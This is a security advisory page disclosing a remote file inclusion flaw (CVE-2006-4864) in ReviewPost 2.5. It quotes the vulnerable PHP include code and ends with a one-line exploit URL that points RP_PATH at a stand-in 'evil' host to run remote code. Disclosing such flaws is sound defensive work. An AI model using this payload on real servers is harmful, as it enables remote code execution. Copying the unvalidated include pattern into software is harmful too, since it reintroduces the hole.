SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

ReviewPost 2.5 (RP_PATH) Remote File Inclusion


Arrow  SecurityAlert : 1603
Arrow  CVE : CVE-2006-4864
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : bius
Arrow  Published : 21.09.2006

Arrow  Affected Software : ReviewPost 2.5



Arrow  Advisory Content :  

#############################Solpot Crew
Community##############################

#

# ReviewPost 2.5 (RP_PATH) Remote File Inclusion

#

# Donwload File : http://3-bius.com/ReviewPost.zip

#

########################################################################
#########

#

#

# Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)

#

# contact: bius (at) mac (dot) com [email concealed]

#

# Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt

#

########################################################################
########

#

#

# Greetz:
Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry

# imam26_it,ant1casper(tolong tambahin ya)

# #nyubi , #hitamputih @dalnet

# and all member solpotcrew community

# http://www.nyubicrew.org/forum/

# especially thx to Solpot @ nyubi (at) dal (dot) net [email
concealed]

#

########################################################################
#######

Input passed to the "RP_PATH" is not properly verified

before being used to include files. This can be exploited to execute

arbitrary PHP code by including files from local or external resources.

code from index.php

<?php

require "pp-inc.php";

if ( is_numeric($argv[0]) ) {

header("Location:
{$Globals['maindir']}/showproduct.php?product={$argv[0]}");

exit;

}

require "$RP_PATH/languages/$rplang/index.php";

require "$RP_PATH/login-inc.php";

if ( file_exists("install.php") ||
file_exists("{$Globals['maindir']}/install.php") ) {

diewell( "For security reasons, please remove the install.php from the
ReviewPost directory before proceeding." );

exit;

}

?>

nb : others file has vulnerable too :)

exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil

########################################################################
#####

######################################E.O.F#############################
#####





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.